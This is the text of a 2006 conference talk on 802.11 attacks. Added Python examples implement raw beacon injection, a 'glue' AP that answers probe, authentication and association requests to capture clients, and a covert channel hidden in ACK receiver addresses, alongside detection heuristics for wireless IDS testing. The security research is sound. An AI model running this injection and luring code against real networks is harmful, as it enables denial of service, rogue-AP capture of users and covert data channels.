Who are we?

* Network security experts in R&D labs
> Employed by France Telecom (major telco)

* Speakers at security-focused conferences
> ShmooCon, ToorCon, FIRST, EuroSec...

* ShmooCon 2005 speakers ;-)
> "Design and Implementation of a Wireless IDS"
Agenda

* State of the art of (some) useful 802.11 attacks
> Starting with WiFi 101
> Non exhaustive, we only have a one hour timeslot ;-)

* Wireless frames and injection quick overview
> Description of 802.11 frames
> Description of raw injection

* Let's present new stuff!
> An enhanced Fake AP
> A Glue AP
> A covert channel
WiFi 101

* Different modes
> Managed (client mode)
> Ad hoc (IBSS / Independent Basic Service Set)
> Master (i.e. AP mode)
> Monitor

* Different channels

* Different SSIDs (networks)
> ESSID = network name
> BSSID = MAC address of the access point
WiFi 101: Different frames

* Management frames
> Authentication / Deauthentication
> Association / Disassociation
> Beacon frame
> Probe request / probe response

* Control frames
> RTS / CTS
> Acknowledgement (ACK) frame

* Data frames

ShmooCon'06 - France Telecom Recherche & Développement (R&D)
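The frame taxonomy above is what every tool on the following slides parses or forges, so here is a small classifier for it, added as an example for this page rather than taken from the talk's tools. It reads the frame-control byte to get type and subtype and pulls out the addresses each kind of frame actually carries (a management or data frame has three addresses and a sequence-control field; an ACK has only a receiver address). The sample frames at the bottom are constructed; they carry no FCS, which the driver or firmware appends.

```python
"""Classify raw IEEE 802.11 frames by type/subtype and extract the addresses
each kind of frame actually carries. Example code added to this page (not from
the ShmooCon'06 talk); the sample frames at the bottom are constructed by hand."""
import struct

TYPE_NAMES = {0: "management", 1: "control", 2: "data"}
SUBTYPES = {
    (0, 0x0): "association request", (0, 0x1): "association response",
    (0, 0x4): "probe request",       (0, 0x5): "probe response",
    (0, 0x8): "beacon",              (0, 0xA): "disassociation",
    (0, 0xB): "authentication",      (0, 0xC): "deauthentication",
    (1, 0xB): "RTS",                 (1, 0xC): "CTS",
    (1, 0xD): "ACK",                 (2, 0x0): "data",
}

def mac(raw):
    return ":".join("%02x" % b for b in raw)

def classify(frame):
    """Decode the MAC header. Control frames carry only a receiver address
    (ACK, CTS) or RA plus TA (RTS); management and data frames carry three
    addresses and a sequence-control field (12-bit seq, 4-bit fragment)."""
    if len(frame) < 10:
        raise ValueError("shorter than the smallest 802.11 frame (ACK, 10 bytes)")
    fc0 = frame[0]                     # protocol version, type, subtype
    ftype, subtype = (fc0 >> 2) & 0x3, (fc0 >> 4) & 0xF
    info = {"type": TYPE_NAMES.get(ftype, "reserved"),
            "subtype": SUBTYPES.get((ftype, subtype), "subtype %d" % subtype),
            "addr1": mac(frame[4:10])}   # RA / DA
    if ftype == 1:
        if subtype == 0xB:             # RTS: the only short control frame with a TA
            if len(frame) < 16:
                raise ValueError("truncated RTS")
            info["addr2"] = mac(frame[10:16])
        return info
    if len(frame) < 24:
        raise ValueError("truncated management/data header")
    seqctl = struct.unpack("<H", frame[22:24])[0]
    info.update({"addr2": mac(frame[10:16]), "addr3": mac(frame[16:22]),
                 "seq": seqctl >> 4, "frag": seqctl & 0xF,
                 "body_len": len(frame) - 24})
    return info

# --- constructed sample frames (no FCS; the driver/firmware appends it) ---
AP, STA = b"\x00\x0c\x41\xaa\xbb\xcc", b"\x00\x16\x6f\x11\x22\x33"

def _mgmt(subtype, da, sa, bssid, seq, body):
    return struct.pack("<BBH6s6s6sH", subtype << 4, 0, 0, da, sa, bssid, seq << 4) + body

SAMPLES = {
    # beacon: TSF, beacon interval 100 TU, capability ESS, SSID IE "lab"
    "beacon": _mgmt(0x8, b"\xff" * 6, AP, AP, 17,
                    struct.pack("<QHH", 123456789, 100, 0x0001) + b"\x00\x03lab"),
    "ack": struct.pack("<BBH6s", 0xD4, 0, 0, STA),            # 10 bytes, RA only
    "rts": struct.pack("<BBH6s6s", 0xB4, 0, 300, AP, STA),    # RA + TA, NAV 300 us
    # data frame with the To-DS flag: addr1 = BSSID, addr2 = SA, addr3 = DA
    "data": struct.pack("<BBH6s6s6sH", 0x08, 0x01, 0, AP, STA, b"\xff" * 6, 5 << 4)
            + b"\xaa\xaa\x03",
}

def summarize(frames):
    """Return {name: (type, subtype, number of addresses present)} for a capture."""
    out = {}
    for name, frame in frames.items():
        c = classify(frame)
        out[name] = (c["type"], c["subtype"], sum(k.startswith("addr") for k in c))
    return out
```

The address count is the detail the covert-channel slides later rely on: an ACK exposes a single receiver address and nothing that ties it to a BSSID or a transmitter.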



Ethereal

* You guys all know about Ethereal
> Easier to use under *nix
> http://www.ethereal.com/
> Good 802.11 support (monitor mode)
Stumbler vs. Sniffer

* Sniffers like Ethereal, tcpdump or Kismet capture raw data frames. Kismet always operates in monitor mode, other sniffers can. Sniffers can see data packets.

* Stumblers query the card firmware to see what networks are detectable in the area. They usually see fewer networks than sniffers, and can't capture data packets, but they don't require special drivers either.

(Thanks to Dragorn's Kismet presentation)
NetStumbler

* http://www.netstumbler.com/
* Current release: NetStumbler 0.4 / MiniStumbler 0.4
* Active monitoring (sends empty probe request frames)
> And does channel hopping
> Can be configured with a GPS
> To build maps...

Screenshot: NetStumbler (not reproduced)
Kismet

* Very famous tool
* http://www.kismetwireless.net/
> Current release: Kismet-2005-08-R1
* Passive monitoring (i.e. listens to beacons / probe responses)
> Also does channel hopping
> Can use a GPS

Screenshot: Kismet (not reproduced)
WarDriving

* Just listen for any IEEE 802.11 activity!
> Stealth...
* Or send probe requests and listen for probe responses...
> Not stealth... ;-)

WarDriving / WarFlying (photos, not reproduced)

Defcon, a few years ago (photo, not reproduced)
Definitions (1/2)

* A rogue access point
> is a wireless access point that has been installed on a secure company network without explicit authorization from local network management

* A wireless intrusion detection system (WIDS)
> is a network device that monitors the radio spectrum for the presence of unauthorized, rogue access points

* Source: Wikipedia, the free encyclopedia
Definitions (2/2)

* No definition for 'fake access point' on Wikipedia
* Could be (in bad English) ;-)
> an illegitimate wireless access point whose purpose is to fool wireless users who usually connect to legitimate access points

* Could also be defined as
> a security nightmare!
Raw Injection (1/3)

* We mean layer 2 frame injection
> 802.11 management, control and data frames
> Could be extremely powerful!

* Goal: inject any arbitrary frame
> A userland tool hands it to the kernel / driver
> The driver hands it to the firmware

* Was really tricky 2 or 3 years ago...
> Prism2/2.5/3 with HostAP was one of the only means of frame injection
> But with limitations (some 802.11 fields are controlled by the firmware)
- Fragmentation, sequence number, BSS timestamp...
Raw Injection (2/3)

* Today a large choice of chipsets and drivers supports it
> Prism2/2.5/3 with HostAP or wlan-ng
> Prism54 with prism54
> Atheros with madwifi
> Ralink RT2x00 with rt2x00
> Realtek RTL8180 with rtl8180

* Check Christophe Devine's aircrack for additional patches

* Injection and sniffing are performed in 'monitor' mode
> socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))
> iwconfig <interface> mode monitor
> ifconfig <interface> up
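As an added example (not the talk's Raw Fake AP source), here is the userland side of the injection path described above, in Python: build a beacon frame byte by byte, open the PF_PACKET / SOCK_RAW / ETH_P_ALL socket on the monitor-mode interface and send it. Assumptions: Linux, an interface already put in monitor mode with the iwconfig/ifconfig commands above, CAP_NET_RAW, and a driver that accepts a bare 802.11 frame on that socket, as the 2006 drivers listed did; current mac80211 drivers instead expect a radiotap header in front of the frame, so the radiotap=True path prepends the minimal 8-byte one. Sequence number and TSF are set by the caller on purpose: with the card in monitor mode they are no longer controlled by the firmware, which is exactly what the Raw Fake AP slides build on.

```python
"""Raw injection of a beacon frame from userland. Example code added to this
page (not the talk's Raw Fake AP source). Assumes a Linux interface already in
monitor mode and a driver that accepts bare 802.11 frames on a PF_PACKET socket
(2006-era drivers); mac80211 drivers want a radiotap header first, and
RADIOTAP_MIN is the minimal one for that case (assumption, radiotap=True)."""
import socket
import struct
import time

BCAST = b"\xff" * 6
ETH_P_ALL = 0x0003
RADIOTAP_MIN = struct.pack("<BBHI", 0, 0, 8, 0)   # version 0, length 8, no fields

def ie(tag, payload):
    """One 802.11 information element: tag, length, value."""
    return struct.pack("<BB", tag, len(payload)) + payload

def build_beacon(bssid, ssid, channel, seq, tsf_us, interval_tu=100, wpa=False):
    """Management header (subtype 8, broadcast DA, SA = BSSID) + fixed fields
    (TSF, beacon interval, capabilities) + tagged parameters (SSID, rates, channel).
    seq and tsf_us come from the caller so an emulated AP can keep them coherent
    from one beacon to the next (cf. the fakeap.pl detection slides)."""
    if not 0 <= seq < 4096:
        raise ValueError("sequence number is a 12-bit field")
    hdr = struct.pack("<BBH6s6s6sH", 0x80, 0x00, 0, BCAST, bssid, bssid, seq << 4)
    cap = 0x0001 | (0x0010 if wpa else 0)           # ESS, plus Privacy when 'encrypted'
    fixed = struct.pack("<QHH", tsf_us, interval_tu, cap)
    tags = (ie(0, ssid.encode()) +
            ie(1, bytes([0x82, 0x84, 0x8B, 0x96, 0x0C, 0x12, 0x18, 0x24])) +  # 802.11g rates
            ie(3, bytes([channel])))                 # DS parameter set
    return hdr + fixed + tags

def open_monitor_socket(iface):
    """socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL)) bound to the monitor interface.
    Needs CAP_NET_RAW; Linux only; not exercised by the test."""
    s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ALL))
    s.bind((iface, 0))
    return s

def beacon_loop(sock, bssid, ssid, channel, count, interval_tu=100, radiotap=False):
    """Send `count` beacons with a monotonic sequence number and a TSF that
    advances with wall-clock time, paced at the advertised beacon interval."""
    t0 = time.monotonic()
    for seq in range(count):
        tsf = int((time.monotonic() - t0) * 1_000_000)
        frame = build_beacon(bssid, ssid, channel, seq & 0xFFF, tsf, interval_tu)
        sock.send((RADIOTAP_MIN if radiotap else b"") + frame)
        time.sleep(interval_tu * 1024 / 1_000_000)   # 1 TU = 1024 us

def parse_fixed(frame):
    """Read back seq, TSF, interval, capabilities and SSID from a built beacon."""
    seq = struct.unpack("<H", frame[22:24])[0] >> 4
    tsf, interval, cap = struct.unpack("<QHH", frame[24:36])
    ssid_len = frame[37]                              # frame[36] is the SSID tag (0)
    return {"seq": seq, "tsf": tsf, "interval": interval, "cap": cap,
            "ssid": frame[38:38 + ssid_len].decode()}
```

Usage on real hardware would be `beacon_loop(open_monitor_socket("wlan0"), bssid, "lab-ap", 6, 50)`; the beacon interval is only approximately honoured, which is the real-time-kernel caveat the Raw Fake AP slides mention.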
Raw Injection (3/3)

* Could be used by a wireless IDS for layer 2 countermeasures
> One goal is to prevent wireless clients from associating to rogue access points
- Thanks to deauthentication / disassociation floods

* Could be used for tricky things
> WEP cracking speedup (a la aircrack)
> Denial of service, association floods
> Fake access points and clients
> And so on...

* Drastically increased the range of feasible attacks...
(Big) Issue For Any Wireless IDS

* Dealing with 'useless' data is a classic issue for any IDS
> Data controlled by an attacker who intends to corrupt the WIDS

* Raw injection is a key feature for corrupting any WIDS
> Inserting arbitrary data into databases
> Aggregating and correlating useless data
> Flooding the GUI (and system administrators)

* A major challenge for any wireless IDS vendor
> How to deal with an attacker flooding the wireless IDS?
fakeap.pl (1/4)

* You guys know about BlackAlchemy's infamous Fake AP!
> Available at: http://www.blackalchemy.to/project/fakeap/

* Basically it's a Perl script using ifconfig and iwconfig
> (Randomly) changes BSSID, ESSID, channel, WEP and txpower
> Feed it with an ESSID list and MAC prefixes

* Wireless havoc for stumblers and wireless IDS
> Fills tables and GUIs with random fake access points

* But...
fakeap.pl (2/4)

* As BSSIDs are randomized (and not cyclic), you may use
> A timeout window to flush 'old' fake access points
- Keep only those that are currently speaking

* As the wireless card is in 'master' mode, all fields are controlled by the driver and firmware, especially
> Sequence number
> BSS timestamp
> Supported capabilities (tagged parameters)

* So what?
fakeap.pl (3/4)

* fakeap.pl could be detected
> Load of ESSIDs, with (sometimes) funny ones ;-)
> Reset BSS timestamps*
- A flood of low BSS timestamps from different sources is a clear sign of a fakeap.pl attack
> (Sometimes) reset sequence numbers
- At the beginning of the attack
> Same tagged parameters for different beacons within a time period
- Layer 2 fingerprinting of the attacker's wireless card

* hint from Josh Wright
fakeap.pl (4/4)

* fakeap.pl pcap capture file
* Take a look at BSS timestamps and tagged parameters...

Fakeap.cap
Wireless IDS and Fake APs...

* Wireless IDS should have fakeap.pl detection engines
> Later slides show means to achieve a good level of detection

* But if the attacker has raw injection capabilities
> It could severely hurt wireless IDS and stumblers
Important Notice!

* All code is in alpha/beta stage
> Raw Fake AP is fully functional
> Raw Glue AP is in alpha stage (needs to be extensively tested)
> Raw Covert is fully functional but quite useless without extended capabilities (file transfer, remote shell)

* These tools were developed for
> Wireless IDS testing
> Proof-of-concept purposes
> Showing how powerful raw injection could be!
> Fun! ;-)

* Will be released under the GPL license...
Raw Fake AP (1/7)

* What about raw injection in monitor mode?
> Today, supported by (most) wireless chipsets, firmwares and drivers

* Could help for a 'Raw Fake AP'...
> A program that emulates IEEE 802.11 access points thanks to wireless raw injection
> Only probe response and beacon frames are supported
> Going towards other management frames could lead to a (rather) complete virtual AP...

* Check the next slides...
Raw Fake AP (2/7)

* Some features
> Raw injection of beacon and probe response frames in monitor mode
> Tries to forge coherent sequence numbers and BSS timestamps
- (depending on driver injection capabilities)
> Tries to keep a coherent time interval between beacons
- (which is hard to achieve without a real-time kernel)
> Supports multiple capability advertisements
- (crypto protocols like WPA/RSN, radio capabilities like data rates)
Raw Fake AP (3/7)

* Should not be detected as a Fake AP attack thanks to
> Coherent BSS timestamps and sequence numbers
> Emulated access points constantly speaking

* Will test your wireless IDS
> Garbage data (invalid characters), high number of access points...
> It becomes really hard for a wireless IDS to classify this as Fake AP activity

* Will hide your real networks from (novice) wardrivers
> How to distinguish between valid and emulated access points?
> Could be a countermeasure activated by a wireless IDS detecting wardriving activity ;-)
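An added example (not the talk's tools) that runs the detection heuristics from the fakeap.pl (3/4) slide against the two beacon generators described on this slide and the previous one. The input is the per-beacon record a monitor-mode sniffer would keep (capture time, BSSID, BSS timestamp, sequence number, a hash of the tagged parameters); both streams below are synthesised models, not captures. fakeap.pl reconfigures a master-mode card for every fake AP, so each beacon shows a fresh BSSID, a freshly reset timestamp and the card's own tagged parameters; the Raw Fake AP style keeps a per-BSSID sequence counter, a timestamp that advances by the beacon interval, and varied capabilities. The thresholds (window, timestamp ceiling, source count) are this example's own assumptions.

```python
"""fakeap.pl-style beacons versus coherent (Raw Fake AP style) beacons, scored
with the heuristics of the fakeap.pl (3/4) slide. Example code added to this
page; the two generators are models of the tools, not captures of them."""
import hashlib
import random
from collections import defaultdict

def fakeap_pl_stream(n, seed=1):
    """Model of fakeap.pl: a master-mode card reconfigured per fake AP, so every
    beacon has a new random BSSID, a TSF just reset by the firmware (constructed
    as < 200 ms), a random seq and the card's one set of tagged parameters."""
    rng = random.Random(seed)
    tags = hashlib.md5(b"rates=1,2,5.5,11;ds;cap=0x0001").hexdigest()
    return [{"t": i * 0.1,
             "bssid": "00:02:2d:%02x:%02x:%02x" % tuple(rng.randrange(256) for _ in range(3)),
             "tsf": rng.randrange(0, 200_000), "seq": rng.randrange(4096), "tags": tags}
            for i in range(n)]

def raw_fakeap_stream(n_aps, beacons_each, seed=2):
    """Model of an emulator: fixed BSSIDs, per-BSSID seq counters, a TSF that
    started long ago and advances one beacon interval (100 TU = 102400 us) per
    beacon, and four different capability profiles spread over the APs."""
    rng = random.Random(seed)
    aps = [{"bssid": "00:0c:41:00:00:%02x" % i, "tsf0": rng.randrange(10**8, 10**10),
            "seq": rng.randrange(4096),
            "tags": hashlib.md5(b"profile-%d" % (i % 4)).hexdigest()} for i in range(n_aps)]
    out = []
    for k in range(beacons_each):
        for ap in aps:
            out.append({"t": k * 0.1024, "bssid": ap["bssid"], "tsf": ap["tsf0"] + k * 102_400,
                        "seq": (ap["seq"] + k) & 0xFFF, "tags": ap["tags"]})
    return out

def detect_fakeap(obs, window=5.0, low_tsf_us=1_000_000, min_sources=8):
    """Alerts: 'low_tsf_flood' when >= min_sources distinct BSSIDs beacon with a
    TSF below low_tsf_us inside `window` seconds (a timer that was just reset);
    'shared_tags' when one tagged-parameter fingerprint covers most BSSIDs
    (layer 2 fingerprint of a single card). Also counts BSSIDs seen only once,
    which a timeout flush would drop."""
    obs = sorted(obs, key=lambda o: o["t"])
    alerts, start = [], 0
    for end in range(len(obs)):
        while obs[end]["t"] - obs[start]["t"] > window:
            start += 1
        low = {o["bssid"] for o in obs[start:end + 1] if o["tsf"] < low_tsf_us}
        if len(low) >= min_sources:
            alerts.append(("low_tsf_flood", obs[end]["t"], len(low)))
            break
    counts, tag_sets = defaultdict(int), defaultdict(set)
    for o in obs:
        counts[o["bssid"]] += 1
        tag_sets[o["tags"]].add(o["bssid"])
    shared = max((len(s) for s in tag_sets.values()), default=0)
    if len(counts) >= min_sources and shared >= 0.8 * len(counts):
        alerts.append(("shared_tags", shared, len(counts)))
    return {"bssids": len(counts),
            "one_shot": sum(1 for c in counts.values() if c == 1),
            "alerts": alerts}
```

The coherent stream trips neither rule, which is the point of this slide: once timestamps, sequence numbers and capabilities are under the injector's control, a WIDS is left with counting access points and judging ESSIDs, and neither distinguishes an emulated AP from a real one.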
Raw Fake AP (4/7)

* Will fool passive and active stumblers / sniffers
> Thanks to beacons regularly sent
> Thanks to probe responses sent back in response to wireless clients' probe requests

* Beacon mode
> Choose channel X
> Send beacons of fake access points on channel X
> Switch channel and so on...

* Probe response mode
> Wait on channel X for NULL probe requests
> Send back probe responses of fake access points on channel X
> Switch channel and so on...
Raw Fake AP (5/7)

* The command line interface lets you choose
> Randomize Open/WEP/WPA/RSN crypto
> Randomize b/g cards
> Channel hopping
> TX power hopping
> Randomize ESSIDs (alphanumeric or not)
> Randomize BSSIDs
> Choose beacon interval
> Choose number of fake access points
> Choose a file with valid OUIs
> Choose a file with ESSIDs
> Choose between beacon or probe response mode
> Select a destination MAC address
Raw Fake AP (6/7)

* Proof-of-concept release
> Lack of features (no configuration file defining fake access points)
> Monolithic, non threaded...
> Do not blame us for ugly coding style!
> Originally designed to test wireless IDS and stumblers

* Released under the GPL licence
Raw Fake AP (7/7)

* Live demo!
Screenshot (Windows XP Wireless Zero Configuration, French locale, not reproduced): the "Wireless Network Connection" / "Choose a wireless network" dialog ("Click an item in the list below to connect to a wireless network in range or to get more information") lists the emulated access points as a series of "Security-enabled wireless network" and "Security-enabled wireless network (WPA)" entries whose ESSIDs are random garbage characters.
Raw Glue AP (1/6)

* A fact!
> Wireless clients are often the weakest link of any wireless infrastructure
> They connect to any network or to preferred networks (cf. WZC slides)

* Wireless IDS/IPS (usually) try to mitigate this by
> Regularly sending deauthentication / disassociation floods to clients, preventing them from associating to rogue access points

* The purpose of this tool is to evaluate another option!
> Catch them in a virtual quarantine area!

* Cf. "Attacking Automatic Wireless Network Selection", Dino A. Dai Zovi, Shane A. Macaulay, http://www.theta44.org/karma/
Raw Glue AP (2/6)

* What about a virtual AP populating every ESSID?
> Catch probe requests
> Catch authentication and association requests

* A kind of Glue AP!
> Once caught, wireless clients may stay associated for a certain time to a non-existent access point!

* Constraint
> Use monitor mode in order to perform both countermeasures and detection
> In order to (eventually) implement it within a wireless IDS/IPS
Raw Glue AP (3/6)

* NULL probe requests are caught in order to deal with clients that automatically associate to any ESSID
> A probe response is sent back with the chosen BSSID and ESSID

* Probe requests with an ESSID are caught in order to deal with clients associating to preferred networks
> A probe response is sent back with the chosen BSSID and the requested ESSID

* Authentication requests must be acknowledged
> And then answered with a successful authentication response

* Association requests must be acknowledged
> And then answered with a successful association response
Raw Glue AP (4/6)

* Proof-of-concept release
> Not really tested
> Not adapted to the real world: catches everyone!
> Lack of features (no configuration file for ESSID/BSSID catching)
> Monolithic, non threaded...
> Do not blame us for ugly coding style!

* Seems to work on some wireless drivers
> Unstable results, needs further improvements
> Estimation of timeouts

* Will only work in 'Open' mode
> But fake APs cannot operate in authenticated mode anyway!
Raw Glue AP (5/6)

* Main difficulties
> ACK frames must be sent back within a (small) timeframe (depends on wireless drivers, usually 300 microseconds)
> Keep-alive packets from the client must be supported

* Coded in C for speed
* Will be released under the GPL license
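The exchanges from the previous slides, as an added example in Python (not the talk's Raw Glue AP, which is in C): a responder that, given a probe, authentication or association request captured in monitor mode, returns the frames the emulated AP has to inject, an immediate ACK followed by the successful response, with one coherent sequence counter and TSF for the fake BSSID. Frame layouts follow 802.11; the client requests are constructed sample data, the BSSID is the one from the demo slide, and the 300 microsecond ACK deadline above is a radio-timing problem that userland Python cannot promise to meet, so it is not addressed here.

```python
"""Glue AP responder: maps a client's probe / authentication / association
request to the frames the emulated AP must inject (ACK, then a successful
response). Example code added to this page, not the talk's Raw Glue AP. The
client requests at the bottom are constructed sample data."""
import struct

BCAST = b"\xff" * 6
OPEN_SYSTEM, STATUS_SUCCESS = 0, 0

def mgmt(subtype, da, sa, bssid, seq, body=b""):
    """Management frame: FC (type 0), duration 0, DA, SA, BSSID, seq control, body."""
    return struct.pack("<BBH6s6s6sH", subtype << 4, 0, 0, da, sa, bssid, seq << 4) + body

def ack(ra):
    """Control frame subtype 13: FC, duration, receiver address (10 bytes)."""
    return struct.pack("<BBH6s", 0xD4, 0, 0, ra)

class GlueAP:
    """One fake BSSID with its own sequence counter, TSF and glued clients."""
    def __init__(self, bssid, ssid):
        self.bssid, self.ssid = bssid, ssid
        self.seq, self.tsf, self.clients = 0, 0, {}

    def _next_seq(self):
        s, self.seq = self.seq, (self.seq + 1) & 0xFFF
        return s

    def _reply(self, subtype, client, body):
        return mgmt(subtype, client, self.bssid, self.bssid, self._next_seq(), body)

    def handle(self, frame):
        """Return the list of frames to inject in response to one captured frame."""
        if len(frame) < 24 or (frame[0] >> 2) & 3 != 0:
            return []                                   # only management frames matter
        subtype = frame[0] >> 4
        da, sa, body = frame[4:10], frame[10:16], frame[24:]
        if subtype == 0x4:                              # probe request (broadcast: no ACK)
            ssid_len = body[1] if len(body) >= 2 and body[0] == 0 else 0
            asked = body[2:2 + ssid_len].decode(errors="replace") or self.ssid  # NULL probe -> ours
            self.tsf += 102_400                         # pretend one beacon interval elapsed
            fixed = struct.pack("<QHH", self.tsf, 100, 0x0001)
            return [self._reply(0x5, sa, fixed + bytes([0, len(asked)]) + asked.encode())]
        if da != self.bssid:
            return []                                   # unicast management for another AP
        if subtype == 0xB and len(body) >= 6:           # authentication request
            alg, trans, _status = struct.unpack("<HHH", body[:6])
            if alg != OPEN_SYSTEM:                      # slide: a fake AP only works in Open mode
                return [ack(sa)]
            self.clients[sa] = "authenticated"
            return [ack(sa), self._reply(0xB, sa, struct.pack("<HHH", alg, trans + 1, STATUS_SUCCESS))]
        if subtype == 0x0 and self.clients.get(sa) == "authenticated":   # association request
            aid = 0xC000 | (len(self.clients) & 0x3FFF)  # AIDs carry the two top bits set
            resp = struct.pack("<HHH", 0x0001, STATUS_SUCCESS, aid) + bytes([1, 4, 0x82, 0x84, 0x8B, 0x96])
            self.clients[sa] = "associated"
            return [ack(sa), self._reply(0x1, sa, resp)]
        return []

# --- constructed client requests against the demo BSSID ---
AP, CLIENT = b"\x30\x77\x6e\x65\x64\x21", b"\x00\x16\x6f\x11\x22\x33"
PROBE_NULL = mgmt(0x4, BCAST, CLIENT, BCAST, 7, bytes([0, 0]))
PROBE_CORP = mgmt(0x4, BCAST, CLIENT, BCAST, 8, b"\x00\x04corp")
AUTH_REQ = mgmt(0xB, AP, CLIENT, AP, 9, struct.pack("<HHH", OPEN_SYSTEM, 1, 0))
ASSOC_REQ = mgmt(0x0, AP, CLIENT, AP, 10,
                 struct.pack("<HH", 0x0001, 10) + b"\x00\x04corp" + bytes([1, 4, 0x82, 0x84, 0x8B, 0x96]))
```

Everything the responder emits goes out through the same monitor-mode socket as the beacons; what keeps the client glued afterwards is answering its keep-alives, which the next slide lists as the remaining difficulty.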
Raw Glue AP (6/6)

* Live demo!
> Who has associated to 30:77:6E:65:64:21?
Raw Covert Channel (1/8)

* Covert channel
> In information theory, a covert channel is a communications channel that does a writing-between-the-lines form of communication.
> Source: Wikipedia, the free encyclopedia

* Writing between the lines
> Use valid frames to carry additional information
> Valid frames could be management, control or data frames

* This tool is 'only' an example! Possibilities are infinite!
Raw Covert Channel (2/8)

* With 802.11, this may be performed by many means
> Using a proprietary protocol within valid or invalid frames
> It gives infinite possibilities thanks to raw injection

* (Some) 802.11 frames are not considered 'malicious'
> Control frames like ACK are lightweight and not suspicious!
- Frame control (16 bits)
- Duration field (16 bits)
- Receiver address (48 bits)
> (Usually) not analyzed by wireless IDS
- No source nor BSSID addresses ;-)

* (Some) 802.11 drivers do not pass ACK frames up in monitor mode (handled in the firmware: e.g. HostAP)
> Increasing stealthiness
Raw Covert Channel (3/8)

* How does it work?
> A client encodes the information and sends ACKs over the air
> A server listens for ACKs and tries to decode the information

* Basically, it uses a magic number in the receiver address
> 2 bytes

* And it encodes the covert channel data in the receiver address
> 1 byte

* Several ACK frames are needed to send information
Raw Covert Channel (4/8)

* Issues
> ACK frames can be missed, wireless is not a reliable medium! ;-)
> Detection may (only) be performed with anomaly detection

* Proof-of-concept release
> No enhanced features

* Will be released under the GPL license
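The encoding from the previous slide, as an added example (not the talk's Raw Covert tool): two magic bytes at the start of the receiver address mark a channel ACK and one byte carries payload. What the remaining three bytes hold is this example's own assumption: a 16-bit chunk index and a one-byte check, which is what lets the receiver notice the lost ACKs mentioned above and discard real ACKs whose RA happens to begin with the magic value. The last function shows the anomaly-detection angle from this slide: an ACK whose receiver address never transmitted on the channel has no legitimate reason to exist. Everything runs on byte strings; no radio is involved.

```python
"""Covert channel in the receiver address of 802.11 ACK frames. Example code
added to this page (not the talk's Raw Covert): RA = magic (2) | index (2) |
payload (1) | check (1); the index/check layout is this example's assumption."""
import struct

MAGIC = b"\x8e\x71"          # assumed channel marker; any two bytes both peers agree on
ACK_FC = 0xD4                # frame control byte 0: control frame, subtype 13

def _check(index, byte):
    """One-byte check over index and payload so stray real ACKs are rejected."""
    return (index ^ (index >> 8) ^ byte ^ 0x5A) & 0xFF

def encode(payload):
    """One 10-byte ACK per payload byte: FC | duration | RA (no FCS; the card adds it)."""
    if len(payload) > 0xFFFF:
        raise ValueError("index field is 16 bits")
    frames = []
    for i, b in enumerate(payload):
        ra = MAGIC + struct.pack("<HBB", i, b, _check(i, b))
        frames.append(struct.pack("<BBH6s", ACK_FC, 0, 0, ra))
    return frames

def decode(frames, expected_len=None):
    """Pick channel ACKs out of a mixed capture, in any order.
    Returns (payload, missing_indices); lost chunks read as 0x00."""
    chunks = {}
    for f in frames:
        if len(f) != 10 or f[0] != ACK_FC:
            continue                         # not an ACK
        ra = f[4:10]
        if ra[:2] != MAGIC:
            continue                         # ordinary ACK for a real station
        i, b, c = struct.unpack("<HBB", ra[2:])
        if c != _check(i, b):
            continue                         # real RA that collides with the magic, or corruption
        chunks.setdefault(i, b)
    n = expected_len if expected_len is not None else (max(chunks) + 1 if chunks else 0)
    missing = [i for i in range(n) if i not in chunks]
    return bytes(chunks.get(i, 0) for i in range(n)), missing

def orphan_acks(frames, known_stations):
    """Anomaly detection: ACKs addressed to a station that never transmitted.
    known_stations is the set of addresses seen as TA/SA on the channel."""
    return [f for f in frames
            if len(f) == 10 and f[0] == ACK_FC and f[4:10] not in known_stations]

# constructed capture: one legitimate ACK to a real station plus the channel
REAL_STA = b"\x00\x11\x22\x33\x44\x55"
REAL_ACK = struct.pack("<BBH6s", ACK_FC, 0, 0, REAL_STA)
CAPTURE = [REAL_ACK] + encode(b"0wned!")
```

A WIDS that keeps a table of transmitter addresses can flag these frames with orphan_acks; one that ignores control frames, as the previous slide notes most do, never sees them at all.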
Raw Covert Channel (5/8)

* Possible enhancements
> Multiple encoding techniques
> Encryption techniques
> Remote shell
> File transfer
> Use invalid frames (see next slide)
Raw Covert Channel (6/8)

* Invalid frames (in the 802.11 sense, i.e. proprietary frames)
> But should be detected by any wireless IDS performing sanity checks on every frame

* Frames with an invalid FCS
> Should require driver/firmware modifications to inject a bad FCS
> Wireless IDSes do not analyze such bad frames
> But should be detected with FCS error statistics (even if harder to diagnose as a covert channel)
Raw Covert Channel (7/8)

* Invalid FCS monitoring
> Usually a bit is set by the firmware when the FCS is invalid
> Most drivers discard packets with a bad FCS thanks to this information
- hal_rxerr_crc for madwifi
- rfmon_header->flags & 0x01 for prism54
> The HostAP driver has a facility for this
- prism2_param <interface> monitor_allow_fcserr 1
Raw Covert Channel (8/8)

* Live demo!
* Did you detect it? ;-)
Questions?

Thanks for your attention

Tools: to be released at http://rfakeap.tuxfamily.org